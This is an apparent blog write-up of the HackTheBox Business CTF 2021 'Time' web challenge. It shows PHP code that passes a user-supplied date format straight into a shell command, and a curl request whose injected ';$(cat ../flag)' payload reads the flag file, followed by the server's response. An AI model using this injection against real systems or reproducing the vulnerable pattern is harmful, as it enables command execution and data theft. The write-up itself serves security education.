twseptian

twseptian

Perpetual Learner

HackTheBox Business CTF 2021 - Time (Web)

1 minute read

Time is a web challenge from HackTheBox Business CTF 2021. This challenge is talking about how to access with using date format? and how to bypass the flag file after we get the date from target machine.

First, run the docker instance,copy the address to browser Emails

Let’s download the source codes,and navigate to TimeController.php

<?php
class TimeController
{
    public function index($router)
    {
        $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
        $time = new TimeModel($format);
        return $router->view('index', ['time' => $time->getTime()]);
    }
}

From the TimeController.php source codes, we found $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S'; with get access to parameter format,then we need to know how to get the flag. Let’s analyze the TimeModel.php code

<?php
class TimeModel
{
    public function __construct($format)
    {
        $this->command = "date '+" . $format . "' 2>&1";
    }

    public function getTime()
    {
        $time = exec($this->command);
        $res  = isset($time) ? $time : '?';
        return $res;
    }
}

from $this->command = "date '+" . $format . "' 2>&1"; we know about the date format and how to execute command from the target url.

Let’s try using curl

$ curl 'http://142.93.35.92:30370/?format=%H-%M-%S-%27;$(cat%20../flag)%27'
<html>
<head>
  <meta name='author' content='makelaris, makelarisjr'>
  <meta name='viewport' content='width=device-width, initial-scale=1, shrink-to-fit=no'>
  <title>Time</title>
  <link link='preload' href='//fonts.googleapis.com/css2?family=Press+Start+2P&display=swap' rel='stylesheet'>
  <link rel='stylesheet' href='//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css' integrity='sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm' crossorigin='anonymous'>
  <link rel='icon' href='/assets/favicon.png' />
  <link rel='stylesheet' href='/static/main.css' />
</head>
<body>
  <nav class="navbar navbar-dark bg-primary navbar-expand-lg mb-4">
    <a class="navbar-brand mb-0" href="?format=%H:%M:%S">🕒 What's the time?</a>
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav">
        <li class="nav-item">
          <a class="nav-link" href="?format=%Y-%m-%d">📅 What's the date? <span class="sr-only">(current)</span></a>
        </li>
      </ul>
    </div>
  </nav>
  <div class="jumbotron vertical-center">
    <div class="container">
      <div class="container">
        <h1 class="jumbotron-heading">><span class='text-muted'>It's</span> sh: 1: HTB{tim3_t4lks...4nd_1t_s4ys_1ts_t1m3_t0_PWN!!!}: not found<span class='text-muted'>.</span></h1>
      </div>
    </div>
  </div>
</body>
<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha384-J6qa4849blE2+poT4WnyKhv5vZF5SrPo0iEjwBvKU7imGFAV0wwj1yYfoRSJoZ+n" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js" integrity="sha384-Q6E9RHvbIyZFJoft+2mJbHaEWldlvI9IOYy5n3zV9zzTtmI3UksdQRVvoxMfooAo" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
</html>

or

$ curl 'http://142.93.35.92:30370/?format=%H-%M-%S-%27;$(cat%20../flag)%27' | html2text | grep HTB{
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1974    0  1974    0     0   1171      0 --:--:--  0:00:01 --:--:--  1171
****** >It's sh: 1: HTB{tim3_t4lks...4nd_1t_s4ys_1ts_t1m3_t0_PWN!!!}: not

Emails

You may also enjoy